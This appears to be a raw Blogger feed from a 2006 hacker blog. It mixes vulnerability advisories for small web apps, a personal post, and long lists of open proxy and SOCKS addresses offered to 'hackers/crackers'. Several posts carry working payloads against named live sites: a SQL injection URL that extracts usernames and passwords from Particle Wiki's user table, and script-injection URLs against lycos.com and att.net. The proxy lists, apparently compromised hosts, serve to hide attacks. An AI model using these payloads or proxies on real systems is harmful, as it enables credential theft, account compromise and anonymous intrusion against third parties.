height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114948554266287023</id><published>2006-06-05T07:32:00.000+02:00</published><updated>2007-03-01T01:25:58.596+01:00</updated><title type='text'>Particle Wiki SQL inj.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 5 june 2006&lt;br /&gt;vendor:www.particlesoft.net/particlewiki/&lt;br /&gt;affected versions:1.0.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Particle Wiki contains a flaw that allows a remote sql injection attacks.Input passed to the "version" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;POC:&lt;br /&gt;&lt;br /&gt;# Exploited by FarhadKey from http://www.kapda.ir&lt;br /&gt;&lt;br /&gt;Username :&lt;br /&gt;http://wiki.particlesoft.net/index.php?version=-1%20union%20select&lt;br /&gt;%201,1,1,1,1,username%20from%20pwiki_users%20/*&lt;br /&gt;Password :&lt;br /&gt;http://wiki.particlesoft.net/index.php?version=-1%20union%20select&lt;br /&gt;%201,1,1,1,1,password%20from%20pwiki_users%20/*&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114948554266287023?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114948554266287023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114948554266287023' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948554266287023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948554266287023'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/particle-wiki-sql-inj.html' title='Particle Wiki SQL inj.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114948475019544344</id><published>2006-06-05T07:18:00.000+02:00</published><updated>2006-06-27T13:25:51.390+02:00</updated><title type='text'>Particle Gallery SQL inj.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 5 june 2006&lt;br /&gt;vendor:www.particlesoft.net/particlegallery/&lt;br /&gt;affected versions:1.0.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Particle Gallery contains a flaw that allows a remote sql injection attacks.Input passed to the "imageid" parameter in "viewimage.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Vendor patch:&lt;br /&gt;Update to 1.0.1&lt;br /&gt;or&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114948475019544344?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114948475019544344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114948475019544344' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948475019544344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114948475019544344'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/particle-gallery-sql-inj.html' title='Particle Gallery SQL inj.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114926133744815375</id><published>2006-06-02T17:08:00.000+02:00</published><updated>2006-06-02T17:15:38.336+02:00</updated><title type='text'>Socks&amp;Proxies 4 today</title><content type='html'>As always all proxies are without logging* feature:) and proxys are https, but socks 4/5. Thanks to ~d4rk*byt3~ &lt;br /&gt;&lt;br /&gt;HTTP:   201.252.14.226:27619   &lt;br /&gt;Sock:  201.252.14.226:20515  &lt;br /&gt;RUSSIAN FEDERATION, MOSCOW, MOSKVA&lt;br /&gt;&lt;br /&gt;HTTP:   83.28.24.131:35214   &lt;br /&gt;Sock:  83.28.24.131:38183  &lt;br /&gt;POLAND, RZESZOW, PODKARPACKIE&lt;br /&gt;&lt;br /&gt;HTTP:   62.241.67.38:35812   &lt;br /&gt;Sock:  62.241.67.38:19970  &lt;br /&gt;FRANCE, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   63.246.180.69:37319   &lt;br /&gt;Sock:  63.246.180.69:12669  &lt;br /&gt;UNITED STATES, AUSTIN, TEXAS&lt;br /&gt;&lt;br /&gt;HTTP:   83.9.46.126:18743   &lt;br /&gt;Sock:  83.9.46.126:10652  &lt;br /&gt;POLAND, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   83.29.204.146:36558   &lt;br /&gt;Sock:  83.29.204.146:42082  &lt;br /&gt;POLAND, LUBLIN, LUBELSKIE&lt;br /&gt;&lt;br /&gt;HTTP:   219.171.8.217:14342   &lt;br /&gt;Sock:  219.171.8.217:37433  &lt;br /&gt;JAPAN, TOKYO, TOKYO&lt;br /&gt;&lt;br /&gt;HTTP:   81.213.163.221:9130   &lt;br /&gt;Sock:  81.213.163.221:54257  &lt;br /&gt;TURKEY, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   213.22.210.170:39181   &lt;br /&gt;Sock:  213.22.210.170:33345  &lt;br /&gt;PORTUGAL, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   80.53.47.210:54306   &lt;br /&gt;Sock:  80.53.47.210:25106  &lt;br /&gt;POLAND, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   62.89.114.165:54158   &lt;br /&gt;Sock:  62.89.114.165:27006  &lt;br /&gt;POLAND, KATOWICE, SLASKIE&lt;br /&gt;&lt;br /&gt;HTTP:   205.200.61.47:59863   &lt;br /&gt;Sock:  205.200.61.47:59961  &lt;br /&gt;CANADA, WINNIPEG, MANITOBA&lt;br /&gt;&lt;br /&gt;HTTP:   193.77.242.174:12531   &lt;br /&gt;Sock:  193.77.242.174:34704  &lt;br /&gt;SLOVENIA, LJUBLJANA, LJUBLJANA&lt;br /&gt;&lt;br /&gt;HTTP:   84.54.138.10:5664   &lt;br /&gt;Sock:  84.54.138.10:15322  &lt;br /&gt;BULGARIA, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   213.65.241.156:55487   &lt;br /&gt;Sock:  213.65.241.156:53241  &lt;br /&gt;SWEDEN, ALINGSåS, VASTRA GOTALAND&lt;br /&gt;&lt;br /&gt;HTTP:   83.38.36.165:60205   &lt;br /&gt;Sock:  83.38.36.165:58491  &lt;br /&gt;SPAIN, ALICANTE, VALENCIA&lt;br /&gt;&lt;br /&gt;HTTP:   66.146.215.193:52026   &lt;br /&gt;Sock:  66.146.215.193:34666  &lt;br /&gt;UNITED STATES, CHICAGO, ILLINOIS&lt;br /&gt;&lt;br /&gt;HTTP:   68.252.234.238:61976   &lt;br /&gt;Sock:  68.252.234.238:11072  &lt;br /&gt;UNITED STATES, CHICAGO, ILLINOIS&lt;br /&gt;&lt;br /&gt;HTTP:   81.27.200.203:43581   &lt;br /&gt;Sock:  81.27.200.203:48051  &lt;br /&gt;CZECH REPUBLIC, BRNO, JIHOMORAVSKY KRAJ&lt;br /&gt;&lt;br /&gt;HTTP:   89.138.83.139:34467   &lt;br /&gt;Sock:  89.138.83.139:56029  &lt;br /&gt;KENYA, KISUMU, NYANZA&lt;br /&gt;&lt;br /&gt;HTTP:   218.152.155.233:27693   &lt;br /&gt;Sock:  218.152.155.233:25030  &lt;br /&gt;KOREA, REPUBLIC OF, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   82.42.186.109:59724   &lt;br /&gt;Sock:  82.42.186.109:4957  &lt;br /&gt;UNITED KINGDOM, EDINBURGH, SCOTLAND&lt;br /&gt;&lt;br /&gt;HTTP:   84.237.193.203:44038   &lt;br /&gt;Sock:  84.237.193.203:64922  &lt;br /&gt;LATVIA, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   200.8.23.29:9820   &lt;br /&gt;Sock:  200.8.23.29:22932  &lt;br /&gt;VENEZUELA, VALENCIA, CARABOBO&lt;br /&gt;&lt;br /&gt;HTTP:   69.157.138.107:49012   &lt;br /&gt;Sock:  69.157.138.107:60825  &lt;br /&gt;CANADA, QUEBEC, QUEBEC&lt;br /&gt;&lt;br /&gt;HTTP:   85.84.16.251:46895   &lt;br /&gt;Sock:  85.84.16.251:31387  &lt;br /&gt;SPAIN, BILBAO, PAIS VASCO&lt;br /&gt;&lt;br /&gt;HTTP:   70.241.68.250:19938   &lt;br /&gt;Sock:  70.241.68.250:51197  &lt;br /&gt;UNITED STATES, HOUSTON, TEXAS&lt;br /&gt;&lt;br /&gt;HTTP:   82.236.182.179:27736   &lt;br /&gt;Sock:  82.236.182.179:6400  &lt;br /&gt;FRANCE, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   24.14.158.122:56762   &lt;br /&gt;Sock:  24.14.158.122:40178  &lt;br /&gt;UNITED STATES, OAK PARK, ILLINOIS&lt;br /&gt;&lt;br /&gt;HTTP:   221.140.240.183:59148   &lt;br /&gt;Sock:  221.140.240.183:35512  &lt;br /&gt;KOREA, REPUBLIC OF, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   201.145.213.196:8862   &lt;br /&gt;Sock:  201.145.213.196:60506  &lt;br /&gt;MEXICO, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   210.1.96.92:45676   &lt;br /&gt;Sock:  210.1.96.92:31813  &lt;br /&gt;PHILIPPINES, MANILA, MANILA&lt;br /&gt;&lt;br /&gt;HTTP:   71.136.41.203:35541   &lt;br /&gt;Sock:  71.136.41.203:53675  &lt;br /&gt;UNITED STATES, SAN DIEGO, CALIFORNIA&lt;br /&gt;&lt;br /&gt;HTTP:   219.254.44.29:10627   &lt;br /&gt;Sock:  219.254.44.29:33141  &lt;br /&gt;KOREA, REPUBLIC OF, SEOUL, KYONGGI-DO&lt;br /&gt;&lt;br /&gt;HTTP:   213.13.198.239:10790   &lt;br /&gt;Sock:  213.13.198.239:47686  &lt;br /&gt;PORTUGAL, MATOSINHOS, PORTO&lt;br /&gt;&lt;br /&gt;HTTP:   201.78.63.185:33753   &lt;br /&gt;Sock:  201.78.63.185:26856  &lt;br /&gt;BRAZIL, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   190.55.14.55:50667   &lt;br /&gt;Sock:  190.55.14.55:58244  &lt;br /&gt;ARGENTINA, RAMOS MEJIA, BUENOS AIRES&lt;br /&gt;&lt;br /&gt;HTTP:   85.137.20.225:13664   &lt;br /&gt;Sock:  85.137.20.225:41080  &lt;br /&gt;SPAIN, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   65.74.86.12:25740   &lt;br /&gt;Sock:  65.74.86.12:4778  &lt;br /&gt;UNITED STATES, KODIAK, ALASKA&lt;br /&gt;&lt;br /&gt;HTTP:   68.12.79.131:19200   &lt;br /&gt;Sock:  68.12.79.131:23696  &lt;br /&gt;UNITED STATES, OKLAHOMA CITY, OKLAHOMA&lt;br /&gt;&lt;br /&gt;HTTP:   201.58.156.144:29653   &lt;br /&gt;Sock:  201.58.156.144:9521  &lt;br /&gt;BRAZIL, -, -&lt;br /&gt;&lt;br /&gt;HTTP:   68.11.229.251:8060   &lt;br /&gt;Sock:  68.11.229.251:52868  &lt;br /&gt;UNITED STATES, BATON ROUGE, LOUISIANA&lt;br /&gt;&lt;br /&gt;HTTP:   70.127.3.45:54696   &lt;br /&gt;Sock:  70.127.3.45:35560  &lt;br /&gt;UNITED STATES, HERNDON, VIRGINIA&lt;br /&gt;&lt;br /&gt;HTTP:   84.56.171.51:48700   &lt;br /&gt;Sock:  84.56.171.51:14620  &lt;br /&gt;GERMANY, STUTTGART, BADEN-WURTTEMBERG&lt;br /&gt;&lt;br /&gt;HTTP:   218.11.16.242:14934   &lt;br /&gt;Sock:  218.11.16.242:46344  &lt;br /&gt;CHINA, HEBEI, HEBEI&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114926133744815375?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114926133744815375/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114926133744815375' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114926133744815375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114926133744815375'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/socksproxies-4-today.html' title='Socks&amp;Proxies 4 today'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114920875867187707</id><published>2006-06-02T02:06:00.000+02:00</published><updated>2006-06-04T23:58:41.020+02:00</updated><title type='text'>Vulnerabilities and Public +personal...</title><content type='html'>In few monthes i had posted reported some harmfull* vulnerabilities, but i think is enough for me.&lt;br /&gt;My friend der4444 some time ago had writen that public exploits s*cks, in my case there was no public exploits or some how to* for those guys who call themselfes "hackers".&lt;br /&gt;I will post/report maximum 10-15 more , and thats will be end. &lt;br /&gt;Of offcourse not for us , not for you .. just for me. &lt;br /&gt;I think that VietMafia  will continue sharing in public part of his job and time.&lt;br /&gt;In my case if i had before few minutes at school to check&amp;report some security holes , than now its over with my free time.&lt;br /&gt;Even i tried to manage my time for my small hobby,..but...but... oh..yeah ..summer is in europe too:) So maybe i will continue with my reports on autumn , i hope so..&lt;br /&gt;&lt;br /&gt;And of course in summer i will not have enough time to learn english , thats means those who had&amp;have problems with my english writing style/grammar will also in future have same problems.. In my native language you will not find  any translator wich will work with my style* , so i think i will continue typing in something similar to english. &lt;br /&gt;&lt;br /&gt;About blog and forum, they will exist as always .&lt;br /&gt;&lt;br /&gt;Even end will come soon ...im still r0t.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114920875867187707?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114920875867187707/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114920875867187707' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114920875867187707'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114920875867187707'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/vulnerabilities-and-public-personal.html' title='Vulnerabilities and Public +personal...'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114920652724523719</id><published>2006-06-02T02:01:00.000+02:00</published><updated>2006-06-06T01:14:31.556+02:00</updated><title type='text'>Unak CMS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 june 2006&lt;br /&gt;vendor:http://www.unak.net&lt;br /&gt;affected versions:1.5 RC2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1) Input passed to the "u_a" and "u_s" parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2) Input to the "u_a" and "u_s" parameters is also not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114920652724523719?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114920652724523719/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114920652724523719' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114920652724523719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114920652724523719'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/unak-cms-vuln.html' title='Unak CMS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114914880936972950</id><published>2006-06-01T09:59:00.000+02:00</published><updated>2006-09-15T17:21:37.643+02:00</updated><title type='text'>Lore &lt;=1.5.6 SQL injection vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 1 june 2006&lt;br /&gt;vendor:http://www.pineappletechnologies.com/products/lore/&lt;br /&gt;affected versions:1.5.6 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Lore contains a flaw that allows a remote sql injection attacks.Input passed to the "article_id" parameter in "comment.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;Status: &lt;br /&gt;reported to vendor&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114914880936972950?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114914880936972950/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114914880936972950' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114914880936972950'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114914880936972950'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/lore-156-sql-injection-vuln.html' title='Lore &lt;=1.5.6 SQL injection vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114912549912118085</id><published>2006-06-01T03:25:00.000+02:00</published><updated>2006-06-01T03:31:39.426+02:00</updated><title type='text'>mchsi.com + att.net  XSS&amp;Full path disclosure</title><content type='html'>As always nothin' special ,similar stuff to lycos . &lt;br /&gt;&lt;br /&gt;http://ackley.mediacomtoday.com/community/news/&lt;br /&gt;video/index.php?id=0531dvs_dozier_ER&amp;ds=Full Path :)&lt;br /&gt;&lt;br /&gt;http://communities.att.net/pe/action/profile&lt;br /&gt;/resetpassword?returnUrl=[XSS]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114912549912118085?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114912549912118085/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114912549912118085' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114912549912118085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114912549912118085'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/mchsicom-attnet-xssfull-path.html' title='mchsi.com + att.net  XSS&amp;Full path disclosure'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114912388999082794</id><published>2006-06-01T03:04:00.000+02:00</published><updated>2006-06-01T03:04:50.136+02:00</updated><title type='text'>XSS in Lycos.com</title><content type='html'>Here will be some examples:&lt;br /&gt;&lt;br /&gt;https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=&lt;br /&gt;6&amp;m_PR=2&amp;m_CBURL=%22%3Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&amp;m_PR&lt;br /&gt;=2&amp;m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&amp;m_CBERRURL&lt;br /&gt;=%22%3Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&amp;m_PR=2&lt;br /&gt;&amp;m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&amp;m_CBERRURL=ht&lt;br /&gt;tp%3A%2F%2Fpridels.blogspot.com%2F&amp;m_LANG=1&amp;Z=1149121877&amp;m_&lt;br /&gt;AL=2&amp;m_DL_FREE=%22%3Cscript%3Ealert('r0t')%3C/script%3E&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ps.lycos contains alot more XSS and other vuln. &lt;br /&gt;I dont know how much can cost db from lycos:)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114912388999082794?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114912388999082794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114912388999082794' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114912388999082794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114912388999082794'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/06/xss-in-lycoscom.html' title='XSS in Lycos.com'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114891429834788879</id><published>2006-05-29T16:50:00.000+02:00</published><updated>2007-02-16T19:20:46.850+01:00</updated><title type='text'>DGNews v 1.5 File Upload Vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 29 may 2006&lt;br /&gt;vendor:www.diangemilang.com/dgscripts.php&lt;br /&gt;affected versions:v 1.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;Due to improper checks of file extensions in admin/upprocess.php it is possible to upload arbitrary files to the "img" directory. This can e.g. be exploited to upload and execute malicious PHP scripts.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note: Successful exploitation requires access to the administration section.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114891429834788879?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114891429834788879/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114891429834788879' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114891429834788879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114891429834788879'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/05/dgnews-v-15-file-upload-vuln.html' title='DGNews v 1.5 File Upload Vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114875753638085809</id><published>2006-05-27T21:18:00.000+02:00</published><updated>2006-05-27T21:19:03.226+02:00</updated><title type='text'>proxy&amp;socks 4 hackers/crackers</title><content type='html'>UNITED STATES, BANGOR, MAINE&lt;br /&gt;HTTPss:  142.167.20.183:8176   &lt;br /&gt;Sockss: 142.167.20.183:5268&lt;br /&gt;&lt;br /&gt;HTTPss: 89.102.105.246:48045&lt;br /&gt;Sockss: 89.102.105.246:38399&lt;br /&gt;&lt;br /&gt;HTTPs:  206.192.43.188:59226   &lt;br /&gt;Socks:  206.192.43.188:61050  &lt;br /&gt;UNITED STATES, COUDERSPORT, PENNSYLVANIA&lt;br /&gt;&lt;br /&gt;HTTPs:  82.46.152.144:40509   &lt;br /&gt;Socks:  82.46.152.144:20800  &lt;br /&gt;UNITED KINGDOM, BIRMINGHAM, ENGLAND&lt;br /&gt;&lt;br /&gt;HTTPs:  69.145.114.241:48424   &lt;br /&gt;Socks:  69.145.114.241:33464  &lt;br /&gt;UNITED STATES, GRAND JUNCTION, COLORADO&lt;br /&gt;&lt;br /&gt;HTTPs:  84.237.193.203:52083   &lt;br /&gt;Socks:  84.237.193.203:52985  &lt;br /&gt;LATVIA, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  83.24.127.135:59158   &lt;br /&gt;Socks:  83.24.127.135:26084  &lt;br /&gt;POLAND, WARSAW, MAZOWIECKIE&lt;br /&gt;&lt;br /&gt;HTTPs:  82.176.14.140:26544   &lt;br /&gt;Socks:  82.176.14.140:42765  &lt;br /&gt;NETHERLANDS, VLISSINGEN, ZEELAND&lt;br /&gt;&lt;br /&gt;HTTPs:  82.42.159.153:51430   &lt;br /&gt;Socks:  82.42.159.153:50484  &lt;br /&gt;UNITED KINGDOM, EDINBURGH, SCOTLAND&lt;br /&gt;&lt;br /&gt;HTTPs:  88.118.194.26:37838   &lt;br /&gt;Socks:  88.118.194.26:58952  &lt;br /&gt;LITHUANIA, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  83.5.41.58:10250   &lt;br /&gt;Socks:  83.5.41.58:53175  &lt;br /&gt;POLAND, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  62.83.4.29:26856   &lt;br /&gt;Socks:  62.83.4.29:60138  &lt;br /&gt;SPAIN, BARCELONA, CATALUñA&lt;br /&gt;&lt;br /&gt;HTTPs:  85.168.58.180:18160  &lt;br /&gt;Socks:  85.168.58.180:59005  &lt;br /&gt;FRANCE, PARIS, ILE-DE-FRANCE&lt;br /&gt;&lt;br /&gt;HTTPs:  200.102.182.138:20185   &lt;br /&gt;Socks:  200.102.182.138:10553  &lt;br /&gt;BRAZIL, PORTO ALEGRE, RIO GRANDE DO SUL&lt;br /&gt;&lt;br /&gt;HTTPs:  63.98.143.110:15336   &lt;br 